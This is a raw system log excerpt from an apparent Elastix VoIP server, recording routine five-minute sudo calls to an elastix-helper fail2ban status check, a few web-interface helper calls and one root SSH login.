      Jun 9 11:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 12:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:08:18 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table httpd
      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table asterisk
      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table sshd
      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table vsftpd
      Jun 9 13:08:20 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --dumpiptables
      Jun 9 13:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 13:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 14:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 15:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 16:51:21 voicesrv01 sshd[15163]: pam_unix(sshd:session): session closed for user root
      Jun 9 16:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 17:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 18:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 19:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:14:09 voicesrv01 sshd[30173]: Accepted password for root from 98.242.248.14 port 52790 ssh2
      Jun 9 20:14:09 voicesrv01 sshd[30173]: pam_unix(sshd:session): session opened for user root by (uid=0)
      Jun 9 20:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 20:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:40:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:50:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 21:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:15:36 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper hdmodelreport
      Jun 9 23:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 00:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 00:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 00:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 00:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 00:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 00:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 00:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 00:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 00:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 00:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 00:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 00:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 01:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 01:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 01:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 01:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 01:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 01:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 01:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 01:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 01:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 01:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 01:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 01:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 02:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 02:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 02:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 02:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
